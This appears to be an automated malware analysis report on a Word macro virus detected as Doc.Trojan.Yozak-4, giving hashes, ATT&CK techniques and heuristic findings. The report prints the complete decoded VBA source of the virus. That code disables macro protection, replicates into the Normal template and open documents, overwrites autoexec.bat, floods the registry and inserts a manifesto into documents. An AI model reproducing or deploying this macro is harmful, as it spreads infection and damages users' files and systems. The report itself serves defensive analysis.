Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7dd7156f9b20b22…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 1999-04-06 12:36:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f9440fd2d402d293cf8db2bf0565adf6
SHA-1: 81b3f99ee544e54752fa517478208345ef6a6370
SHA-256: d7dd7156f9b20b22d6b5332c375b0a1382961c1f42cf05a05eeda5da1be76b57
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1059.003 Windows Command Shell

The sample contains a VBA macro that is triggered by the Document_Open event. The macro attempts to disable Word's macro virus protection (Options.VirusProtection = False) and then calls a subroutine named 'Payloader'. Payloader attempts to write a value to the registry entry 'Stupid' under HKEY_LOCAL_MACHINE and creates the batch file 'C:\autoexec.bat' containing echo commands. The ClamAV detection 'Doc.Trojan.Yozak-4' further supports the assessment that this file is malicious.

Heuristics 3

  • ClamAV: Doc.Trojan.Yozak-4 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Yozak-4
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12590 bytes
SHA-256: 8a7e374424d3e136a157d49a454d0343370aee9ad7064cea30f4d1c06831bfef
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Dim ni As Boolean, ai As Boolean
If NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ni = True
If ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ai = True
x = VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.Lines(1, 86)
If ni = True And ai = False Then
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
ElseIf ni = False And ai = True Then
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
End If
Payloader
z = "R" & Int(2354365 * Rnd)
VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.ReplaceLine 17, z
VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.ReplaceLine 22, "Sub " & z & "()"
End Sub
Sub Payloader()
On Error Resume Next
Randomize
If Day(Now) = Minute(Now) Then
For x = 1 To Int(6000009 * Rnd)
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE", "Stupid") = "Free Vic."
Next x
Open "C:\autoexec.bat" For Output As F
Print F; "echo Free Vic."
Print F; "echo 3C supoorts you Vic."
Print F; "Echo All VX scene support you Vic."
Print F; "echo Free Vic."
CommandBars(Int(9 * Rnd)).Name = "-Free Vic.-"
End If
End Sub
Sub HelpAbout()
MsgBox "-Free Vic-", vbApplicationModal, "Yo"
End Sub
Sub ViewVbCode()
On Error Resume Next
MsgBox "-Free Vic-"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.deletelines 1, 86
NormalTemplate.Saved = False
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.deletelines 1, 86
Application.ShowVisualBasicEditor = True
End Sub
Sub FileSave()
On Error Resume Next
Randomize
If Month(Now) = Int(12 * Rnd) Then
MsgBox "-Free Vic-", vbCritical, "3C"
Selection.MoveStart
Selection.TypeText "WE use knowledge to create life."
Selection.TypeText "You use knowledge to kill life."
Selection.TypeText "And You call US criminals."
Selection.TypeText "You make drugs and YOU call US criminals"
Selection.TypeText "You make war and YOU call Us criminals"
Selection.TypeText "You let people die and YOU call US criminals"
Selection.TypeText "You use atomic energy for bombs and YOU call US criminals"
Selection.TypeText "You destroy the environment and YOU call US criminals"
Selection.TypeText "You spread disease and YOU call US criminals"
Selection.TypeText "You pedophilia and YOU call US criminals"
Selection.TypeText "YES we are CRIMINALS and our CRIME is to share"
Selection.TypeText "Our knowledge. But in comparison what you have DONE"
Selection.TypeText "WE are angels."
Selection.TypeText "Dr.yozak"
Selection.TypeText "It's the 3C way of thinking"
Selection.TypeText "-FREE VIC-"
Beep
MsgBox "Free Vic.", vbApplicationModal, "___________"
End If
ActiveDocument.Save
End Sub
Sub FileClose()
If Day(Now) = 1 Or Day(Now) = 30 Then
MsgBox "3C way of thinking", vbApplicationModal, ":P"
Open "c:\readme.txt" For Random As gr
Print gr; "It's the 3C way of thinking we are smoking blasting drinking."
Print gr; "free vic "
Print gr; "CCC-members.xoom.com/CCCriminals-CCC"
Close gr
MsgBox "Money or the Power"
MsgBox "Power or the Money"
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/f8492600d448452090c0986b3d51cd36.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7646 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt V
... (truncated)